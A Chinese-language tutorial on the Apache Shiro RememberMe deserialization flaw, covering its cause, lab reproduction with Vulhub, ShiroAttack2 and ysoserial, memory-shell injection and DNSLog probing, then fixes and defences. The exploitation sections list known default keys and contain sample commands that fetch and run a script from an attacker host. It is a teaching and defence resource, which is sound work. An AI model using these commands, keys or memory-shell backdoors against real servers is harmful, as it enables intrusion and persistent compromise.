1. 项目概述为什么Shiro反序列化漏洞值得深挖如果你是一名Java开发者或者安全研究员那么“Shiro反序列化漏洞”这个词组对你来说一定不陌生。它几乎成了近年来Java安全领域的一个标志性议题每隔一段时间就会以新的变种CVE编号出现在我们的视野里。我第一次深入接触这个漏洞是在一次内部红蓝对抗演练中一个看似坚不可摧的Java Web应用就因为一个默认配置的Shiro框架被轻松拿下了权限。这让我意识到这个漏洞的威力远超许多开发者的想象它不仅仅是安全人员的“玩具”更是真实威胁的“放大器”。简单来说Apache Shiro是一个强大且易用的Java安全框架提供了身份验证、授权、加密和会话管理等功能。其反序列化漏洞的核心在于Shiro为了提供“记住我”RememberMe这个用户友好的功能使用了AES加密的Cookie。问题就出在早期版本的Shiro使用了硬编码的默认密钥。攻击者一旦获取或猜解到这个密钥就能伪造一个恶意的RememberMe Cookie服务器在解密并反序列化这个Cookie时就会执行攻击者预先构造的恶意代码从而实现远程命令执行RCE。这就像你家大门用的是一把全市锁匠都知道的通用钥匙攻击者根本不需要撬锁直接拿钥匙开门就行了。这个漏洞的深远影响在于它的“基础性”和“普遍性”。Shiro被广泛应用于各种企业级Java应用中从后台管理系统到金融业务平台。漏洞利用门槛相对较低且危害极大直接获取服务器控制权。因此无论是出于防御加固的目的还是进行安全测试学习深入理解其原理、掌握复现方法、并知晓修复方案对于开发、运维和安全人员都至关重要。本文将从一个实践者的角度带你从零开始彻底拆解Shiro反序列化漏洞的方方面面不仅有原理的深度剖析更有步步为营的实战复现和独家避坑指南。2. 漏洞原理深度剖析从“记住我”到“控制你”要真正理解Shiro反序列化漏洞我们不能停留在“默认密钥”这个表面原因必须深入到Shiro的会话管理机制和Java反序列化的底层逻辑中去。2.1 Shiro的会话管理与RememberMe机制Shiro的核心功能之一是会话Session管理。在Web环境中它通常用JSESSIONID来跟踪用户会话。而“记住我”RememberMe功能是为了提升用户体验用户关闭浏览器后再次访问无需重新登录。Shiro实现这个功能的方式是将用户的身份信息序列化后使用AES加密然后作为一个Cookie默认名为rememberMe发送给浏览器保存。其处理流程可以概括为登录成功并勾选“记住我”Shiro将用户的Principal身份信息等数据序列化成字节数组。加密使用一个对称密钥cipherKey对这个字节数组进行AES加密。存储将加密后的密文进行Base64编码设置为rememberMeCookie的值。下次访问浏览器自动带上这个Cookie。Shiro过滤器AbstractShiroFilter会截获请求发现JSESSIONID不存在但有rememberMeCookie。解密与反序列化Shiro对Cookie值进行Base64解码然后用相同的cipherKey进行AES解密得到序列化后的字节数组。最后调用Java的ObjectInputStream对这个字节数组进行反序列化还原出用户身份对象从而实现自动登录。问题的致命点在于步骤2的密钥cipherKey。在Shiro 1.2.4及之前版本这个密钥是硬编码在源代码中的一个固定值kPHbIxk5D2deZiIxcaaaA。这意味着全世界的Shiro应用只要使用了默认配置它们加解密“记住我”Cookie的钥匙都是一模一样的。2.2 Java反序列化漏洞的“弹药库”漏洞的另一个核心支柱是Java反序列化本身的安全缺陷。反序列化是将字节流还原为对象的过程。ObjectInputStream.readObject()方法在还原对象时会自动调用该对象的readObject、readResolve等方法。如果被反序列化的类路径中包含一些“特性”类这些类的方法中包含了危险操作如执行系统命令那么反序列化过程就会变成一个代码执行通道。攻击者并不需要目标应用中有自己编写的恶意类。他们可以利用Java生态中广泛存在的、具有“危险特性”的第三方库称为“利用链”或“Gadget Chain”来构造一个恶意的序列化对象。常见的利用链包括Apache Commons Collections (CC链)这是早期最著名、最经典的利用链。其Transformer、InvokerTransformer等类可以构造出动态执行任意方法的调用链。其他链如CB链CommonsBeanutils、Jdk7u21链等原理类似都是通过一系列类的巧妙组合最终达成执行Runtime.exec()或类似效果。注意这里有一个关键点也是很多初学者困惑的地方。Shiro漏洞的利用依赖于两条线的交汇一是Shiro的默认密钥导致加密形同虚设二是目标服务器的ClassPath中必须存在可用的反序列化利用链如Commons-Collections的JAR包。两者缺一不可。2.3 漏洞利用过程串联现在我们将两条线串联起来看看一次完整的攻击是如何发生的信息收集攻击者发现目标网站使用了Shiro框架可通过Cookie中的rememberMe字段、错误页面特征等判断。密钥确认尝试使用公开的默认密钥或通过其他漏洞泄露的密钥进行攻击。构造Payload攻击者选取一个适合目标环境即目标服务器ClassPath中存在的库的反序列化利用链例如CC3链构造一个能执行命令如curl http://attacker.com/shell.sh | bash的恶意Java对象并将其序列化为字节数组。加密Payload使用Shiro的默认AES密钥对这个恶意序列化字节数组进行加密然后进行Base64编码。发起请求将编码后的字符串作为rememberMeCookie的值发送给目标服务器的任意接口甚至不需要是登录接口。漏洞触发Shiro的过滤器处理请求发现rememberMeCookie于是用默认密钥解密、反序列化。在反序列化过程中恶意利用链被触发攻击者预设的命令在服务器上得以执行。获取权限攻击者通过命令执行写入Webshell、反弹Shell或进行内网横向移动最终完全控制服务器。这个流程揭示了漏洞的本质Shiro框架将一个来自外部的、潜在不可信的数据Cookie经过一个已知密钥的解密后直接送入了不安全的Java反序列化接口从而导致了远程代码执行。3. 漏洞复现环境搭建与工具链选择“纸上得来终觉浅绝知此事要躬行。”安全研究尤其如此。下面我将手把手带你搭建一个用于复现Shiro反序列化漏洞的靶场环境并介绍核心的工具链。这是我们后续所有实战操作的基础。3.1 靶场环境搭建为了安全且可控地学习我们绝对不能在未经授权的真实系统上进行测试。搭建本地靶场是最佳选择。方案一使用现成漏洞靶场推荐新手Vulhub这是我个人最推荐的方式。Vulhub是一个基于Docker的预集成漏洞环境集合一键启动非常方便。安装Docker和Docker Compose。从GitHub克隆Vulhub项目git clone https://github.com/vulhub/vulhub.git进入Shiro漏洞目录cd vulhub/shiro/CVE-2016-4437启动环境docker-compose up -d访问http://your-ip:8080即可看到一个带有登录页面的Shiro应用。优势环境纯净、隔离性好、与官方漏洞描述一致复现成功率高。方案二手动编译部署有漏洞的Shiro应用如果你希望更深入地理解应用结构可以手动部署。准备环境安装JDK 8、Maven和一个Servlet容器如Tomcat 9。创建Web项目创建一个简单的Maven Web项目在pom.xml中引入有漏洞的Shiro版本依赖例如dependency groupIdorg.apache.shiro/groupId artifactIdshiro-web/artifactId version1.2.4/version !-- 存在硬编码密钥的版本 -- /dependency dependency groupIdcommons-collections/groupId artifactIdcommons-collections/artifactId version3.2.1/version !-- 提供CC利用链 -- /dependency配置Shiro编写shiro.ini启用rememberMe功能并不自定义cipherKey让其使用默认值。编写简单页面创建一个需要认证的页面和一个登录页。打包部署将项目打包成WAR文件部署到Tomcat。实操心得对于首次复现强烈建议使用Vulhub。它能帮你绕过环境配置中无数的坑如JDK版本冲突、依赖库缺失、配置错误等让你快速聚焦于漏洞本身。手动部署更适合在完全理解漏洞后用于验证自定义环境下的漏洞存在性。3.2 核心工具链介绍工欲善其事必先利其器。复现和利用Shiro漏洞以下几款工具是社区公认的利器Shiro反序列化漏洞检测工具ShiroAttack2一款图形化、功能强大的国产集成化工具。它集成了密钥爆破、利用链检测、回显Payload生成、内存马注入等高级功能对新手非常友好。你可以直接输入目标URL它就能自动检测是否存在漏洞、尝试爆破密钥、并选择合适的利用链。shiro-exploit一款命令行工具通常用于快速检测和利用。可以通过Python脚本运行适合集成到自动化流程中。Payload生成工具ysoserial这是Java反序列化漏洞领域的“瑞士军刀”。它能够生成针对各种利用链CommonsCollections, CommonsBeanutils, Jdk7u21等的序列化Payload。在Shiro漏洞利用中我们通常先用其他工具检测出有效密钥和利用链然后用ysoserial生成对应的Payload再进行AES加密和Base64编码。使用方式示例java -jar ysoserial.jar CommonsCollections3 curl http://attacker.com/shell payload.ser会生成一个执行curl命令的序列化文件。加密与编码工具由于Shiro的Payload需要经过AES加密和Base64编码因此我们需要相应的代码或工具。幸运的是像ShiroAttack2这样的集成工具已经内部完成了这些步骤。如果你想手动研究可以用Python的Crypto库和base64库编写简单的加密脚本。工具链工作流典型的利用流程是先用ShiroAttack2进行目标探测和密钥爆破 - 确认可用密钥和利用链 - 根据需求如命令执行、回显、内存马工具会自动或手动使用ysoserial生成Payload并完成加密编码 - 发送恶意Cookie进行攻击。4. 漏洞复现实战从检测到利用环境工具准备就绪现在我们进入最核心的实战环节。我将以使用Vulhub靶场和ShiroAttack2工具为例演示完整的漏洞复现过程。4.1 第一步靶场启动与确认启动Vulhub的Shiro环境后访问http://192.168.1.100:8080请替换为你的虚拟机IP。你会看到一个简单的登录页面使用任意错误账号密码登录并勾选“Remember Me”然后通过浏览器的开发者工具F12查看网络请求。在请求头或响应头中你应该能清晰地看到一个名为rememberMe的Cookie删除后再次登录勾选记住我会出现。这就是存在Shiro会话管理的标志。4.2 第二步使用工具进行漏洞检测与密钥爆破打开ShiroAttack2工具。目标设置在URL地址栏输入靶场地址http://192.168.1.100:8080。选择模式通常先使用“检测”或“爆破”模式。工具会发送一个特殊的Payload根据服务器返回的响应特征如是否返回rememberMeCookie、响应时间、错误信息等来判断是否存在漏洞以及可能的密钥。执行检测点击“开始”或类似按钮。ShiroAttack2内置了常见的Shiro默认密钥字典如kPHbIxk5D2deZiIxcaaaA,2AvVhdsgUs0FSA3SDFAdag,4AvVhmFLUs0KTA3Kprsdag等会进行快速碰撞。获取结果很快工具会提示检测完成并显示结果。在成功的情况下你会看到类似“漏洞存在”和“找到密钥[kPHbIxk5D2deZiIxcaaaA]”的提示。同时工具也会检测服务器ClassPath中可用的反序列化利用链例如“检测到利用链CommonsCollectionsK2, CommonsBeanutils1”。注意事项密钥爆破的成功率并非100%。如果目标系统修改了默认密钥且新密钥不在工具的字典中则爆破会失败。但这不意味着绝对安全只是利用门槛变高。在实际安全测试中密钥可能通过源码泄露、配置文件泄露等其他方式获得。4.3 第三步构造并执行Exploit以命令执行为例在工具检测到有效密钥和利用链后我们就可以进行真正的利用了。这里演示最常见的远程命令执行。选择利用模块在ShiroAttack2中切换到“命令执行”或类似标签页。配置参数密钥会自动填入上一步爆破成功的密钥。利用链从检测到的可用链中选取一个例如CommonsCollectionsK2。不同的链在不同JDK版本和依赖库环境下成功率不同可以逐个尝试。命令输入你想要在目标服务器上执行的命令。例如whoami查看当前用户curl http://your-attack-machine/shell.sh -o /tmp/s.sh下载远程脚本ping -c 1 your-attack-machine测试网络连通性常用于无回显的盲打选择编码为了确保命令字符串在HTTP传输中不出现问题通常需要选择编码如UTF-8。执行攻击点击“执行”或“攻击”按钮。工具会在后台完成以下工作使用ysoserial生成你指定命令对应的序列化Payload。使用你提供的AES密钥加密该Payload。将加密结果进行Base64编码。构造一个HTTP请求其中Cookie头包含rememberMeBase64Encoded(Encrypted(Payload))。发送请求到目标URL。查看结果有回显如果命令执行成功且有输出如whoami回显了root工具的回显区域会直接显示命令执行结果。无回显盲打对于ping或下载文件这类没有直接HTTP响应的命令你需要通过其他方式验证例如在自己的攻击机上监听ICMP包或HTTP请求来确认命令是否执行成功。一次成功的攻击日志可能看起来像这样[] 目标: http://192.168.1.100:8080 [] 检测到Shiro框架。 [] 开始爆破默认密钥... [] 发现有效密钥: kPHbIxk5D2deZiIxcaaaA [] 检测可用利用链... 发现: CommonsCollectionsK2, CommonsBeanutils1 [] 使用密钥: kPHbIxk5D2deZiIxcaaaA, 利用链: CommonsCollectionsK2, 命令: whoami [] 生成Payload成功。 [] 发送恶意请求... [] 请求完成状态码: 200 [] 命令回显: root看到root回显的那一刻意味着你已经成功利用了该漏洞获取了目标服务器的最高权限。4.4 第四步高级利用——内存马注入直接执行命令是“一次性”的想要获得一个持久的、隐蔽的后门注入“内存马”Memory Shell是更高级的做法。内存马是运行在服务器Web容器如Tomcat, Jetty进程内存中的恶意后门不落盘传统文件查杀难以发现。ShiroAttack2等工具通常集成了内存马注入功能。以注入Tomcat Filter型内存马为例在工具中选择“内存马”或“回显”等标签页。选择内存马类型如“Tomcat Filter MemShell”。填写监听信息即你攻击机的IP和端口用于接收内存马连接。设置密码为内存马连接设置一个密码增加一点安全性。执行注入。如果成功工具会返回一个特殊的URL路径和密码。此时你可以通过访问http://target:port/inject_path?passwordxxxcmdwhoami这样的URL来远程执行命令这个后门会一直存在直到Web容器重启。实操心得内存马注入比普通命令执行对利用链的稳定性要求更高。在实际测试中CommonsBeanutils1链在Tomcat 8/9环境下注入Filter内存马的成功率相对较高。注入成功后务必使用冰蝎、蚁剑等支持自定义连接的Webshell管理工具进行连接管理它们有专门的插件支持内存马连接。5. 漏洞修复方案与防御纵深构建成功复现漏洞让我们理解了攻击者的手段而作为防御者我们的终极目标是消除风险。修复Shiro反序列化漏洞需要一个多层次、纵深防御的思路不能仅仅依赖一种方法。5.1 根本性修复升级与密钥定制升级Shiro版本这是最直接有效的办法。Apache官方在后续版本中移除了硬编码密钥并强制要求开发者自行配置。将Shiro升级到1.2.5及以上版本。强烈建议升级到最新的稳定版如1.11.x以同时修复其他潜在的安全问题。升级注意高版本可能存在API变更需要仔细测试业务功能。自定义强密钥如果因兼容性问题暂时无法升级必须修改默认密钥。在Shiro的配置文件如shiro.ini或Spring配置中显式设置一个复杂且保密的cipherKey。生成强密钥示例Java代码import org.apache.shiro.crypto.AesCipherService; import java.util.Base64; Key key new AesCipherService().generateNewKey(); String base64Key Base64.getEncoder().encodeToString(key.getEncoded()); System.out.println(你的新密钥: base64Key);将生成的密钥配置到securityManager.rememberMeManager.cipherKey属性中。关键点这个密钥必须被视为敏感信息像数据库密码一样保管绝不能泄露在源码仓库、配置文件备份或日志中。5.2 防御性加固WAF与运行时防护在应用层之外可以部署额外的安全层。部署Web应用防火墙WAF配置WAF规则识别和拦截包含rememberMeCookie且其值特征符合Shiro反序列化Payload的请求如Base64解码后开头是aced...的Java序列化魔术字。但高级攻击者可能会对Payload进行分块、编码混淆来绕过静态规则。使用RASP运行时应用自我保护RASP技术在应用运行时提供保护能够从内部监控Java反序列化操作ObjectInputStream.readObject的调用并分析被反序列化的类是否构成危险利用链。一旦发现立即中断操作并告警。RASP提供了更深层次的防御但可能对性能有轻微影响。5.3 开发规范与架构优化从源头和架构上减少风险。避免不必要的反序列化审查代码避免从不可信源如网络请求、用户输入直接反序列化数据。如果必须使用考虑使用更安全的替代方案如JSON、XML等数据格式。使用白名单机制如果业务确实需要Java原生序列化应使用ObjectInputFilterJDK 9或第三方库如SerialKiller来设置反序列化类的白名单只允许反序列化业务必要的、安全的类从根本上杜绝利用链的加载。移除危险依赖在确保业务不受影响的前提下检查pom.xml或gradle文件移除项目中不必要的、已知存在危险类的库如老版本的commons-collections。可以使用mvn dependency:tree命令分析依赖树。注意盲目移除commons-collections可能导致依赖它的其他库如commons-beanutils运行出错。更稳妥的做法是升级到修复了相关问题的版本如commons-collections4并结合白名单机制。5.4 应急响应与监控即使采取了上述措施也应建立应急机制。监控与告警在服务器和WAF日志中监控异常的、携带超长或特殊字符rememberMeCookie的请求并设置告警。定期漏洞扫描使用专业的SCA软件成分分析工具定期扫描项目依赖及时发现并升级存在已知漏洞的组件包括Shiro本身及其相关依赖。入侵检测部署HIDS主机入侵检测系统监控服务器上异常的进程启动、网络连接和文件创建行为以便在内存马注入等攻击发生时能及时察觉。修复不是一劳永逸的安全是一个持续的过程。将“升级强密钥”作为底线辅以架构优化和运行时监控才能构建起有效的防御纵深。6. 常见问题排查与高级技巧在复现和研究的路上你肯定会遇到各种“坑”。下面我总结了一些典型问题及其解决方案以及一些提升效率的高级技巧。6.1 复现失败常见原因排查表问题现象可能原因排查步骤与解决方案工具检测显示“未发现Shiro”1. 目标确实未使用Shiro。2. 网络不通或目标服务未启动。3. 工具检测Payload被WAF拦截。1. 手动访问目标查看Cookie、错误页面源码是否包含shiro、rememberMe等关键字。2. 用ping/curl检查网络和端口。3. 尝试使用其他检测工具或修改User-Agent等请求头。检测到Shiro但密钥爆破失败1. 目标使用了非默认密钥且不在字典中。2. 目标Shiro版本过高已修复漏洞。3. 依赖库中无可用利用链。1. 尝试通过源码泄露、备份文件泄露等方式寻找密钥。2. 确认Shiro版本。1.2.5以上默认密钥漏洞已修复。3. 使用工具检测可用利用链若为空则无法直接RCE。密钥爆破成功但执行命令无回显1. 命令执行成功但输出被丢弃盲注。2. 选择的利用链在当前环境不稳定。3. 命令本身执行失败路径、权限问题。1. 使用盲注命令验证如ping your_ip或curl your_ip在攻击机监听确认。2. 更换其他检测到的利用链重试。3. 尝试使用绝对路径的命令如/usr/bin/whoami或测试简单命令如echo 123。工具显示成功但服务器无反应1. Payload加密或编码过程出错。2. 目标JDK版本与利用链不兼容高版本JDK内置了反序列化过滤器。3. 服务器存在杀软或RASP拦截。1. 使用工具内置的“检测”功能验证密钥和链是否依然有效。2. 尝试使用针对高版本JDK的利用链如CommonsCollectionsK2在某些JDK8下可用。3. 查看服务器应用日志是否有安全拦截记录。内存马注入失败1. 利用链不稳定无法执行复杂初始化代码。2. 目标Web容器非Tomcat或版本不兼容。3. 内存马路径或密码冲突。1. 优先使用CommonsBeanutils1链尝试注入Tomcat Filter内存马。2. 确认目标容器类型。不同容器Jetty, Resin需要不同的内存马类型。3. 尝试使用工具生成的不同路径和密码。6.2 高级技巧与深度利用无CommonsCollections依赖的利用如果目标环境没有commons-collections依赖是不是就没辙了并非如此。Shiro自身依赖的commons-beanutils同样可以构造利用链CB链。此外高版本JDK中自带的java.util.PriorityQueue等类也能形成利用链Jdk链。工具如ShiroAttack2通常集成了多种链的检测就是为此准备。利用DNSLog进行无回显探测在完全无回显命令执行结果看不到网络也ping不通的“盲”环境下如何验证漏洞存在和命令执行DNSLog技术是利器。你可以让目标服务器执行nslookup一个由你控制的子域名这样的命令。如果漏洞存在且命令执行成功目标服务器会向这个域名发起DNS解析请求你在DNSLog平台就能看到解析记录从而证实漏洞。这在探测内网系统时特别有用。Key的进一步获取与拓展除了默认密钥还有哪些密钥可能被使用一些开源项目、框架脚手架或开发者可能使用了常见的弱密钥例如空密钥、简单字符串的Base64编码等。可以尝试拓展爆破字典包含这些常见弱密钥。此外关注shiro.ini、application.yml、application.properties等配置文件的泄露密钥可能就在其中。代码审计中寻找线索在安全审计中如何快速定位Shiro的使用和配置全局搜索代码库中的关键词org.apache.shiro.、RememberMeManager、setCipherKey、cipherKey。检查shiro.ini或Spring的Security配置类。重点看AbstractShiroFilter的配置和RememberMe功能是否开启。6.3 我踩过的那些“坑”JDK版本之殇早期在JDK 8u121以下版本利用非常顺畅。但之后Oracle增加了反序列化过滤器等安全机制导致很多旧链失效。复现时务必注意靶场环境Docker镜像的JDK版本最好与工具说明保持一致。如果复现失败第一个怀疑点就是JDK版本。依赖链的“玄学”有时候同一个War包部署在Tomcat 8.5和Tomcat 9上可用的利用链居然不同。这是因为Web容器内部类加载机制和自带的库版本有差异。多准备几个不同的利用链进行尝试是必须的。“记住我”功能未开启有些应用虽然引入了Shiro但并未实际启用rememberMe功能。在这种情况下即使存在默认密钥过滤器也不会去处理rememberMeCookie导致攻击无效。判断是否启用的一个方法是尝试正常登录并勾选“记住我”看后续请求是否携带该Cookie。工具误报一些工具在检测时可能因为服务器返回的某些特征如特定的错误码、响应头而误报漏洞存在。最可靠的验证方式永远是能实际执行一条命令并看到回显或者通过DNSLog等外带方式确认。理解这些问题的根源不仅能帮你解决复现时的困难更能让你在真实的安全评估中保持清晰的排查思路避免被表面现象迷惑。安全研究就是在不断的“遇坑”和“填坑”中积累经验的。